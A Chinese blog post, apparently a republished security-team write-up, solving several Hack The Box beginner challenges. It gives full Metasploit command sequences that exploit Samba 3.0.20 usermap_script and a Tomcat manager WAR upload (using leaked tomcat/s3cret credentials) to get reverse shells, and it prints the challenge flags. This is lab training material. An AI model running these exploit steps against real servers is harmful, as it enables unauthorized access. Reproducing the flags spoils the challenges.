【渗透测试】Hackthebox之Beginner Track系列

admin 2021年9月17日23:03:47评论587 views字数 1989阅读6分37秒阅读模式
【渗透测试】Hackthebox之Beginner Track系列

【渗透测试】Hackthebox之Beginner Track系列



【渗透测试】Hackthebox之Beginner Track系列


01

Lame

端口扫描,nmap -sV -sS  -A 10.10.10.3  

【渗透测试】Hackthebox之Beginner Track系列

发现对方开放21、22、139、445端口。通常445端口是需要关闭的,且开启了netbios-ssn服务,可知NETBIOS是和TCP/IP捆绑在一起的。当NETBIOS运行时,你的后门打开了,因为NETBIOS不光允许局域网内的用户访问你的硬盘资源,internet上的黑客也能进入。比如之前的永恒之蓝漏洞就是通过445端口利用的。所以可以使用msf去漏洞利用。

【渗透测试】Hackthebox之Beginner Track系列

Msf打开后输入

search samba 3.0.20

搜索samba 3.0.20版本可利用的exploit

【渗透测试】Hackthebox之Beginner Track系列

发现有一个可利用的exp,接着输入:

use exploit/multi/samba/usermap_script //使用此expset rhosts 10.10.10.3 //设置目标IP为10.10.10.3set lhost 10.10.14.4 //设置本机IP地址为10.10.14.4options //检查配置是否有遗漏,没有遗漏即可开始攻击exploit //漏洞利用


【渗透测试】Hackthebox之Beginner Track系列

【渗透测试】Hackthebox之Beginner Track系列



漏洞利用成功!当前是root用户,我们可以升级下shell为TTY

SHELL=/bin/bash script -q /dev/null

【渗透测试】Hackthebox之Beginner Track系列

然后去搜寻flag,最后在用户根目录下找到了root.txt,然后cat一下拿到flag

【渗透测试】Hackthebox之Beginner Track系列

然后接着我们要寻找用户flag(这个靶场一个题目是有两个flag的,一个是user flag,一个是root flag),我们在home目录寻找

【渗透测试】Hackthebox之Beginner Track系列

找到user flag,本节完成!


Find The Easy Pass

【渗透测试】Hackthebox之Beginner Track系列

【渗透测试】Hackthebox之Beginner Track系列

本题是CTF中的reverse题,下载文件做题。

打开OD,智能搜索

【渗透测试】Hackthebox之Beginner Track系列

有个fortran!,检查一遍

【渗透测试】Hackthebox之Beginner Track系列

密码正确,然后flag就是HTB { fortran!}



Weak RSA


【渗透测试】Hackthebox之Beginner Track系列

密码学题,解压发现两个文件:flag.enc和key.pub

题目是weak,说明是弱公钥分解,我们可以使用RsaCtf工具进行破解


git clone https://github.com/Ganapati/RsaCtfTool.gitsudo apt-get install libgmp3-dev libmpc-devcd RsaCtfToolpip3 install -r "requirements.txt"

然后使用

python RsaCtfTool.py –-publickey  key.pub  –-uncipherfile flag.enc


【渗透测试】Hackthebox之Beginner Track系列

狗日的今日运气不好工具解不出来,跳过

HTB {s1mpl3_Wi3n3rs_4tt4ck}



Jerry

【渗透测试】Hackthebox之Beginner Track系列

扫描端口:nmap -sV -sS -A 10.10.10.95

【渗透测试】Hackthebox之Beginner Track系列

可以发现开放8080端口,apache tomcat解析容器。我们通过浏览器访问8080端口

【渗透测试】Hackthebox之Beginner Track系列

是个tomcat的默认页面,点击manager app可以看到有个登录窗口

【渗透测试】Hackthebox之Beginner Track系列

我们可以使用tomcat的默认账号密码,也可以使用admin,admin这种看看是否可以登录

【渗透测试】Hackthebox之Beginner Track系列

输入admin/admin后发现是个403页面,仔细一看,可以看到泄露了账号密码,tomcat/s3cret。清除cookie后重新使用tomcat/s3cret登录。

【渗透测试】Hackthebox之Beginner Track系列

登录成功,显示页面配置信息

向下翻滚,我们突然看到有个文件上传war包的地方,我想这是个可以利用的漏洞点

我们可以使用msfvenom生成一个war木马上传。不过我没找到webshell,我们也可以使用msf的一个tomcat文件上传的模块进行上传。

use exploit/multi/http/tomcat_mgr_uploadshow options //我们先看看需要设置什么东西

【渗透测试】Hackthebox之Beginner Track系列

set HttpPassword s3cret  //设置登录密码set HttpUsername tomcat //设置登录账号set rhosts 10.10.10.95 //设置目标ip地址set rport 8080 //设置目标端口set lhost 10.10.14.4  //设置本机kali的ip地址exploit //漏洞利用

【渗透测试】Hackthebox之Beginner Track系列

【渗透测试】Hackthebox之Beginner Track系列

攻击成功,获得shell。然后搜寻flag,管理员用户的桌面上发现flags目录,里面有个2 for the price of 1.txt

【渗透测试】Hackthebox之Beginner Track系列

Type “2 for the price of 1.txt”

【渗透测试】Hackthebox之Beginner Track系列

Flag到手

后面还有几题不想写了,累了!!


备注:欢迎加入我们暗魂安全团队,投简历至[email protected],最快当天技术面试。

我们有hackthebox靶场的VIP会员,享受专用靶场练习




【渗透测试】Hackthebox之Beginner Track系列


【渗透测试】Hackthebox之Beginner Track系列

【渗透测试】Hackthebox之Beginner Track系列

【渗透测试】hackthebox靶场之Vaccine

【渗透测试】hackthebox靶场之Oopsie

【渗透测试】hackthebox靶场之Archetype

【编程语言】操作系统先来先服务调度算法


【渗透测试】Hackthebox之Beginner Track系列
【渗透测试】Hackthebox之Beginner Track系列
微信搜一搜
【渗透测试】Hackthebox之Beginner Track系列
暗魂攻防实验室


本文始发于微信公众号(暗魂攻防实验室):【渗透测试】Hackthebox之Beginner Track系列

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月17日23:03:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】Hackthebox之Beginner Track系列https://cn-sec.com/archives/373473.html

发表评论

匿名网友 填写信息